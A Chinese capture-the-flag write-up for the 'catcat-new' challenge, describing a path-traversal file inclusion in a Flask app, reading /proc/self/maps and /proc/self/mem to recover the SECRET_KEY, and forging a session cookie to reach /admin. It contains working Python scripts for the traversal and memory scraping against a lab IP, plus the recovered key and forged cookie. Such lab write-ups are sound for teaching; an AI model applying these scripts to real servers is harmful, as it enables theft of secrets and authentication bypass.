攻防世界: catcat-new

攻防世界: catcat-new

本文知识点:

  1. 常用的系统文件的作用

    • /proc/self/cmdline: 程序启动的命令行参数
    • /proc/self/maps: 程序使用的内存地址(有点像页表,记录程序使用了那些地址,这些地址的读写权限等)
    • /proc/self/mem: 可以读取或则程序正在使用的内存,不能直接读取,需要配合/proc/self/maps来进行读取。(猜测虚拟地址的原因,导致很多内存实际是没有分配的,读取就会出错)
  2. flask伪造session的生成

    可以借助这个工具进行生成:https://github.com/noraj/flask-session-cookie-manager, 具体的使用见后文。

题目网页:

初步分析

经过一番点击后,发现可能有文件包含的漏洞,如下:

测试后确实存在文件包含相关的漏洞,如下:

proc/self/cmdline

查看当前程序启动时用的命令函参数:

格式化数据

前面得知存在文件包含的漏洞,因此可以考虑构造payload: ../app.py, 得到app.py的源代码

可以使用下面的代码格式化数据

python 复制代码
test = b'import os\nimport uuid\nfrom flask import Flask, request, session, render_template, Markup\nfrom cat import cat\n\nflag = ""\napp = Flask(\n __name__,\n static_url_path=\'/\', \n static_folder=\'static\' \n)\napp.config[\'SECRET_KEY\'] = str(uuid.uuid4()).replace("-", "") + "*abcdefgh"\nif os.path.isfile("/flag"):\n flag = cat("/flag")\n os.remove("/flag")\n\n@app.route(\'/\', methods=[\'GET\'])\ndef index():\n detailtxt = os.listdir(\'./details/\')\n cats_list = []\n for i in detailtxt:\n cats_list.append(i[:i.index(\'.\')])\n \n return render_template("index.html", cats_list=cats_list, cat=cat)\n\n\n\n@app.route(\'/info\', methods=["GET", \'POST\'])\ndef info():\n filename = "./details/" + request.args.get(\'file\', "")\n start = request.args.get(\'start\', "0")\n end = request.args.get(\'end\', "0")\n name = request.args.get(\'file\', "")[:request.args.get(\'file\', "").index(\'.\')]\n \n return render_template("detail.html", catname=name, info=cat(filename, start, end))\n \n\n\n@app.route(\'/admin\', methods=["GET"])\ndef admin_can_list_root():\n if session.get(\'admin\') == 1:\n return flag\n else:\n session[\'admin\'] = 0\n return "NoNoNo"\n\n\n\nif __name__ == \'__main__\':\n app.run(host=\'0.0.0.0\', debug=False, port=5637)'
print(test.decode())

文件内容输出

python 复制代码
import os
import uuid
from flask import Flask, request, session, render_template, Markup
from cat import cat

flag = ""
app = Flask(
    __name__,
    static_url_path='/',
    static_folder='static'
)
app.config['SECRET_KEY'] = str(uuid.uuid4()).replace("-", "") + "*abcdefgh"
if os.path.isfile("/flag"):
    flag = cat("/flag")
    os.remove("/flag")


@app.route('/', methods=['GET'])
def index():
    detailtxt = os.listdir('./details/')
    cats_list = []
    for i in detailtxt:
        cats_list.append(i[:i.index('.')])

    return render_template("index.html", cats_list=cats_list, cat=cat)


@app.route('/info', methods=["GET", 'POST'])
def info():
    filename = "./details/" + request.args.get('file', "")
    start = request.args.get('start', "0")
    end = request.args.get('end', "0")
    name = request.args.get('file', "")[:request.args.get('file', "").index('.')]

    return render_template("detail.html", catname=name, info=cat(filename, start, end))


@app.route('/admin', methods=["GET"])
def admin_can_list_root():
    if session.get('admin') == 1:
        return flag
    else:
        session['admin'] = 0
    return "NoNoNo"


if __name__ == '__main__':
    app.run(host='0.0.0.0', debug=False, port=5637)

代码解读:

下面部分代码生成SECRET_KEY, 这个**SECRET_KEY会被flask用来生成session**。后面我们伪造seesion的时候也需要用到。

python 复制代码
app.config['SECRET_KEY'] = str(uuid.uuid4()).replace("-", "") + "*abcdefgh"

下面部分代码是读取flag这个文件,读取后进行删除,因此我们不能直接通过文件包含漏洞直接得到flag的内容

python 复制代码
if os.path.isfile("/flag"):
    flag = cat("/flag")
    os.remove("/flag")

下面这部分代码看到/admin这个路由下面有一个分支能够返回flag,但是需要session中的admin字段值为1,才会返回flag

python 复制代码
@app.route('/admin', methods=["GET"])
def admin_can_list_root():
    if session.get('admin') == 1:
        return flag
    else:
        session['admin'] = 0
    return "NoNoNo"

获得session的SECRET_KEY

前面得知我们需要访问/admin这个路由,并且session中admin字段的值必须为1,我们才能得到flag。因此我们考虑伪造session。

为了伪造session,我们需要先得到生成session的SECRET_KEY。由于这个key的特征比较明显,且以"*abcdefgh"结尾,因此我们直接通过读取程序的内存得到。

获取文件proc/self/maps的输出

为了读取/porc/self/mem,我们先读取proc/self/maps, 避免访问到未分配的内存,导致程序崩溃。可以使用下面的代码获得文件的输出,并保存到maps.txt

bash 复制代码
import requests

url = 'http://61.147.171.103:56444/info'

# 这个函数的功能是穷举../的个数,实际上../后面发现都是两个
def get_file(file, n=10):
    by_pass = "../"
    for i in range(n):
        params = {'file': by_pass * i + file}
        res = requests.get(url, params=params)
        if res.status_code == 200 and "not exist or can not be read" not in res.text:
            by_pass = by_pass * i
            return res

    return None

res = get_file("proc/self/maps")
print(res.url)
tmp = re.search("<p>(.*?)</p>", res.text)
b = eval(html.unescape(tmp.group(1)))   # 将得到的数据解析,然后转换为字节数组
with open("maps.txt", "w") as f:
    f.write(html.unescape(b.decode()))

读取proc/self/mem中的内容

读取maps.txt文件中的内容,并根据此来读取服务器中文件proc/self/mem中的内容

python 复制代码
import requests

url = 'http://61.147.171.103:56444/info'

addr = []
with open("./maps.txt", "r") as f:
    for line in f.readlines():
        if "rw" in line:
            res = re.search("([0-9a-f]+)-([0-9a-f]+)", line)
            start_addr = res.group(1)
            end_addr = res.group(2)
            addr.append((int(start_addr, 16), int(end_addr, 16)))


param = {"file": "../../proc/self/mem", "start": addr[0][0], "end": addr[0][1]}
res = requests.get(url, params=param)
print(res.url)
print(len(addr))
for s, e in addr:
    param = {"file": "../../proc/self/mem", "start": s, "end": e}

    try:
        res = requests.get(url, params=param, timeout=10)
        if res.status_code == 200:
            # break
            print(res.url)
            secret_key = re.findall(r"[a-z0-9]{32}\*abcdefgh", res.text)
            if secret_key:
                print(secret_key)       # 输出 ['35283a686d334d68a247b335e39149e4*abcdefgh']
                break
    except requests.exceptions.Timeout:
        print("超时")

输出结果:['35283a686d334d68a247b335e39149e4*abcdefgh']

也就是SECRET_KEY的值为35283a686d334d68a247b335e39149e4*abcdefgh

通过SECRET_KEY伪造session

访问/admin路径

当我们访问/admin这个路由的时候,我们会收到服务端返回的session数据。我们需要保留session中的其他字段,只修改admin字段(虽然这个seesion中只有admin字段,但是实际场景中可能含有多个)。

然后使用flask_session_cookie_manager3.py进行解密,其中文件可以从https://github.com/noraj/flask-session-cookie-manager得到。

如上图, 将服务器传送的session解码,然后修改内容,加密得到的session为eyJhZG1pbiI6MX0.aW4zWw.rP0KTjXqUOOC3oG2srnVC75RIYg

将session设置到请求头中,然后发送请求,得到flag!!!

相关推荐
阿雄不会写代码2 小时前
Let‘s Encrypt HTTPS 证书配置指南
前端·chrome
每天吃饭的羊2 小时前
hash结构
开发语言·前端·javascript
吃吃喝喝小朋友2 小时前
JavaScript异步编程
前端·javascript
CS创新实验室2 小时前
《计算机网络》深入学:轮询和令牌传递协议
开发语言·计算机网络·考研·php·408
Trae1ounG3 小时前
Vue生命周期
前端·javascript·vue.js
小李独爱秋3 小时前
计算机网络经典问题透视:试比较先进先出排队(FIFO)、公平排队(FQ)和加权公平排队(WFQ)的优缺点
服务器·计算机网络·算法·web安全·信息与通信·队列
程序员小李白3 小时前
js数据类型详细解析
前端·javascript·vue.js
weixin_462446233 小时前
Python用Flask后端解析Excel图表,Vue3+ECharts前端动态还原(附全套代码)
前端·python·flask·echats